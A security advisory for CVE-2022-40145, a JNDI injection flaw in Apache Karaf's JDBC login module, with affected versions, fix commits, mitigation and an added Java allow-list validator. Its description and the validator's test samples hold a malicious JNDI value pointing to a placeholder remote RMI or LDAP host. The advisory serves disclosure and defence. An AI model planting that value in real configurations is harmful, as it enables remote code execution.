-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

CVE-2022-40145: LDAP injection vulnerability in JDBC Login Module with JDK 8

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2

Description:

The method org.apache.karaf.jaas.modules.jdbc.JDBCUtils#doCreateDatasource
uses InitialContext.lookup(jndiName) without filtering the name.
A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" +
DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,
"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.

This is vulnerable to a remote code execution (RCE) attack when a
configuration uses a JNDI LDAP data source URI and an attacker has
control of the target LDAP server.

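As an added illustration of the missing filtering (this is not Apache Karaf's own code or fix): an allow-list check for the DATASOURCE option that rejects any JNDI name carrying a remote URL scheme before InitialContext.lookup() is ever called. The class name, the handling of prefix-less names and the sample values are assumptions.

```java
import java.util.Locale;

// Added illustration, not Apache Karaf's code: validate the JAAS JDBC login
// module's DATASOURCE option before it reaches InitialContext.lookup().
public final class DataSourceNameCheck {
    // Prefixes used by the DATASOURCE option, as shown in the advisory.
    static final String OSGI_PREFIX = "osgi:";
    static final String JNDI_PREFIX = "jndi:";

    /**
     * Returns true only for names that resolve inside the process: an OSGi
     * service reference, or a JNDI name that is scheme-less ("jdbc/karaf")
     * or in the in-VM "java:" namespace. Any other scheme (rmi://, ldap://,
     * iiop://, ...) would make the lookup contact a remote naming service.
     */
    public static boolean isSafeDataSourceName(String name) {
        if (name == null || name.trim().isEmpty()) {
            return false;
        }
        if (name.startsWith(OSGI_PREFIX)) {
            // e.g. "osgi:javax.sql.DataSource"; require a non-empty service name
            return name.length() > OSGI_PREFIX.length();
        }
        // Assumption: a name without the "jndi:" prefix is also treated as JNDI.
        String jndiName = name.startsWith(JNDI_PREFIX)
                ? name.substring(JNDI_PREFIX.length()) : name;
        int colon = jndiName.indexOf(':');
        if (colon < 0) {
            return true; // no URL scheme at all, e.g. "jdbc/karaf"
        }
        String scheme = jndiName.substring(0, colon).toLowerCase(Locale.ROOT);
        return scheme.equals("java"); // allow-list: only the local java: namespace
    }

    public static void main(String[] args) {
        String[] samples = {
            "osgi:javax.sql.DataSource",        // the default value from the advisory
            "jndi:java:comp/env/jdbc/karaf",
            "jdbc/karaf",
            "jndi:rmi://x.x.x.x:xxxx/Command",  // the malicious value from the advisory
            "jndi:ldap://x.x.x.x:xxxx/Command",
            "jndi:LDAP://x.x.x.x:xxxx/Command", // letter case must not bypass the check
        };
        for (String s : samples) {
            System.out.println((isSafeDataSourceName(s) ? "allow  " : "reject ") + s);
        }
    }
}
```

Deploying such a check is a defence-in-depth measure only; the real remedy remains the upgrade named under Mitigation.
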
This has been fixed in revision:

https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1

Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2
or later as soon as possible, or ensure the configured data source uses a correct path.

JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7568

Credit: This issue was discovered and reported by Xun Bai <bbbbear68@gmail.com>